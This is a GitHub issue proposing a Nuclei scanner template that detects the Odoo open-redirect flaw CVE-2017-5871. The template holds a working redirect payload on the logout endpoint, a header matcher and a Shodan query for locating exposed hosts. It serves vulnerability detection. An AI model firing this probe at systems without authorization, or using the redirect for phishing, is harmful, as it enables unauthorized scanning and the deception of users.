### ISSUE TITLE
CVE-2017-5871

### ISSUE THREAD

**Issue by 1337rokudenashi** [projectdiscovery/nuclei-templates#10874]
### Is there an existing template for this?

- [X] I have searched the existing templates.

### Nuclei Template

```yaml
id: CVE-2017-5871

info:
  name: Odoo - Open Redirect
  author: 1337rokudenashi
  severity: medium
  description: |
    CVE-2017-5871 is an Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL.
  impact: |
    Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft.
  remediation: |
    Update Odoo to the latest patched version provided by the vendor.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2017-5871
  classification:
    cve-id: CVE-2017-5871
    cwe-id: CWE-601
    cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: "Odoo"
    product: odoo
    vendor: odoo
  tags: cve2017,cve,odoo,open-redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/session/logout?redirect=https://getgophish.com/"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "location"
          - "https://getgophish.com/"

      - type: status
        status:
          - 301
          - 302
          - 303
          - 307
          - 308
```

### Anything else?

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5871
![Screenshot 2024-10-01 214542](https://github.com/user-attachments/assets/dea77806-4017-46ef-b957-d2e274bff658)
